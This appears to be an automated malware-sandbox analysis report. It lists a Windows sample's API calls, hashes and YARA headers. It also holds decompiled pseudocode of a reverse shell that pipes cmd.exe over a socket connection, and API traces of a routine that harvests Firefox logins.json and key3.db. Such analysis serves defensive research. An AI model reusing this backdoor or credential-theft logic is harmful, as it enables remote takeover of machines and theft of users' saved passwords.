                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                                                                • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 2968164691-0
                                                                                • Opcode ID: 103eeeb97acaa7d5c55de47944acb6744d5aa2fbb65e00bc2df7f303617395e3
                                                                                • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                                                                • Opcode Fuzzy Hash: 103eeeb97acaa7d5c55de47944acb6744d5aa2fbb65e00bc2df7f303617395e3
                                                                                • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402B8A, Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 291pipesleepfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00402B8A(char _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				void _v16;
				signed int _v20;
				long _v24;
				long _v28;
				void* _v44;
				char _v60;
				char _v76;
				char* _t54;
				int _t68;
				void* _t79;
				CHAR* _t80;
				int _t91;
				signed int _t120;
				void* _t136;
				CHAR* _t142;
				void* _t146;

				if(( *0x41b85c & 0x00000001) != 0) {
					_t142 = 0;
				} else {
					 *0x41b85c =  *0x41b85c | 0x00000001;
					_t142 = 0;
					E00402010(0x41b800, 0);
					E00413E72(0x402f89);
				}
				if(( *0x41b85c & 0x00000002) == 0) {
					 *0x41b85c =  *0x41b85c | 0x00000002;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(0x402f7e);
				}
				_t50 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
				_v20 = _v20 | 0xffffffff;
				_v16 = _t142;
				if( *0x41b888 != 0) {
					L12:
					_v24 = _t142;
					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
					if(_v24 <= _t142) {
						_t146 = _t146 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
						_v20 = _t54;
					} else {
						_t136 = malloc(_v24);
						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
						if(_v28 > _t142) {
							if(_v16 <= _t142) {
								L18:
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
								_t146 = _t146 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
								_v20 = _t54;
							} else {
								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
								_t68 = strncmp(_t136, _t54, _v16);
								_t146 = _t146 + 0xc;
								if(_t68 != 0) {
									goto L18;
								} else {
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
									_t146 = _t146 - 0x10;
									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
									_v20 = _t54;
								}
							}
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						free(_t136);
					}
					goto L22;
				} else {
					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
					if(_t50 == 0) {
						L11:
						if( *0x41b888 != 0) {
							do {
								goto L12;
								L22:
								if(_v20 == 0xffffffff) {
									 *0x41b889 =  *0x41b889 & 0x00000000;
								}
								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
								if(_t54 <= 0) {
									_v16 = _t142;
								} else {
									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
								}
								Sleep(0x64);
							} while ( *0x41b889 != 0);
							TerminateProcess(0x41b878->hProcess, _t142);
							CloseHandle( *0x41b87c);
							_t50 = CloseHandle( *0x41b878);
						}
						E004020F4(_t50, 0x41b800);
						CloseHandle( *0x41b858);
						CloseHandle( *0x41b874);
						 *0x41b888 =  *0x41b888 & 0x00000000;
						_t91 = 1;
					} else {
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
						0x41b7f0->nLength = 0xc;
						 *0x41b7f8 = 1;
						 *0x41b7f4 = _t142;
						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
							_t91 = 0;
						} else {
							_t120 = 0x11;
							memset(0x41b7a8, 0, _t120 << 2);
							_t79 =  *0x41b7a0; // 0x0
							 *0x41b7e0 = _t79;
							_t80 =  *0x41b874; // 0x0
							0x41b7a8->cb = 0x44;
							 *0x41b7d4 = 0x101;
							 *0x41b7d8 = _t142;
							 *0x41b7e4 = _t80;
							 *0x41b7e8 = _t80;
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
							 *0x41b889 = 1;
							E00402038(0x41b800);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E0040209B(0x41b800, 0x415664);
							_t146 = _t146 + 0xc;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
							Sleep(0x12c);
							_t142 = 0;
							goto L11;
						}
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t91;
			}
























                                                                                0x00402b9f
                                                                                0x00402bbf
                                                                                0x00402ba1
                                                                                0x00402ba1
                                                                                0x00402ba8
                                                                                0x00402bad
                                                                                0x00402bb7
                                                                                0x00402bbc
                                                                                0x00402bc8
                                                                                0x00402bca
                                                                                0x00402bdc
                                                                                0x00402be7
                                                                                0x00402bec
                                                                                0x00402bf4
                                                                                0x00402bfb
                                                                                0x00402c01
                                                                                0x00402c0c
                                                                                0x00402c0f
                                                                                0x00402d86
                                                                                0x00402d94
                                                                                0x00402d97
                                                                                0x00402da0
                                                                                0x00402e77
                                                                                0x00402e85
                                                                                0x00402e8f
                                                                                0x00402e94
                                                                                0x00402da6
                                                                                0x00402db0
                                                                                0x00402dc1
                                                                                0x00402dca
                                                                                0x00402dd3
                                                                                0x00402e33
                                                                                0x00402e3b
                                                                                0x00402e41
                                                                                0x00402e52
                                                                                0x00402e5c
                                                                                0x00402e61
                                                                                0x00402dd5
                                                                                0x00402ddb
                                                                                0x00402de3
                                                                                0x00402de9
                                                                                0x00402dee
                                                                                0x00000000
                                                                                0x00402df0
                                                                                0x00402df8
                                                                                0x00402dfe
                                                                                0x00402e15
                                                                                0x00402e1f
                                                                                0x00402e24
                                                                                0x00402e27
                                                                                0x00402dee
                                                                                0x00402e67
                                                                                0x00402e67
                                                                                0x00402e6e
                                                                                0x00402e74
                                                                                0x00000000
                                                                                0x00402c15
                                                                                0x00402c1f
                                                                                0x00402c29
                                                                                0x00402d79
                                                                                0x00402d80
                                                                                0x00402d86
                                                                                0x00000000
                                                                                0x00402e97
                                                                                0x00402e9b
                                                                                0x00402e9d
                                                                                0x00402e9d
                                                                                0x00402eab
                                                                                0x00402eb3
                                                                                0x00402f02
                                                                                0x00402eb5
                                                                                0x00402ebc
                                                                                0x00402eca
                                                                                0x00402ed7
                                                                                0x00402ee0
                                                                                0x00402eed
                                                                                0x00402efa
                                                                                0x00402efa
                                                                                0x00402f07
                                                                                0x00402f0d
                                                                                0x00402f21
                                                                                0x00402f33
                                                                                0x00402f3b
                                                                                0x00402f3b
                                                                                0x00402f47
                                                                                0x00402f52
                                                                                0x00402f5a
                                                                                0x00402f5c
                                                                                0x00402f63
                                                                                0x00402c2f
                                                                                0x00402c3e
                                                                                0x00402c4b
                                                                                0x00402c67
                                                                                0x00402c71
                                                                                0x00402c7b
                                                                                0x00402c85
                                                                                0x00402e2c
                                                                                0x00402ca5
                                                                                0x00402cac
                                                                                0x00402cb6
                                                                                0x00402cb8
                                                                                0x00402cbe
                                                                                0x00402cc3
                                                                                0x00402ccd
                                                                                0x00402cd7
                                                                                0x00402ce1
                                                                                0x00402ce8
                                                                                0x00402ced
                                                                                0x00402cf2
                                                                                0x00402d06
                                                                                0x00402d20
                                                                                0x00402d25
                                                                                0x00402d2d
                                                                                0x00402d34
                                                                                0x00402d45
                                                                                0x00402d46
                                                                                0x00402d47
                                                                                0x00402d48
                                                                                0x00402d49
                                                                                0x00402d4e
                                                                                0x00402d57
                                                                                0x00402d6e
                                                                                0x00402d71
                                                                                0x00402d77
                                                                                0x00000000
                                                                                0x00402d77
                                                                                0x00402c85
                                                                                0x00402c29
                                                                                0x00402f68
                                                                                0x00402f71
                                                                                0x00402f7d

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                                                                • getenv.MSVCRT ref: 00402C34
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                                                                • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                                                                • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                                                                • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                                                                  • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                                                                  • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                                                                • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                                                                • malloc.MSVCRT ref: 00402DA9
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                                                                • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                                                                • free.MSVCRT(00000000), ref: 00402E6E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                                                                • WriteFile.KERNEL32(00000000), ref: 00402EED
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                                                                • Sleep.KERNEL32(00000064), ref: 00402F07
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                                                                • CloseHandle.KERNEL32 ref: 00402F33
                                                                                • CloseHandle.KERNEL32 ref: 00402F3B
                                                                                • CloseHandle.KERNEL32 ref: 00402F52
                                                                                • CloseHandle.KERNEL32 ref: 00402F5A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                                                                • String ID: SystemDrive$cmd.exe
                                                                                • API String ID: 1882443052-3633465311
                                                                                • Opcode ID: 4cdcbeff41b87a60cb661a28674f3e8aec1f44d53d5197bf257b633bfeeee15e
                                                                                • Instruction ID: 0121bb856768c0d2b30f6d73f3edf8f7852bc9241180a475d7ad49acf624a365
                                                                                • Opcode Fuzzy Hash: 4cdcbeff41b87a60cb661a28674f3e8aec1f44d53d5197bf257b633bfeeee15e
                                                                                • Instruction Fuzzy Hash: 97B1A531A40209EFCB01AB61DD4DAEE7FB9EB84750F14803AF911A61E0CBB84945DBDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040728F, Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 206fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                                                                • getenv.MSVCRT ref: 004072D9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                                                                  • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                                                                  • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
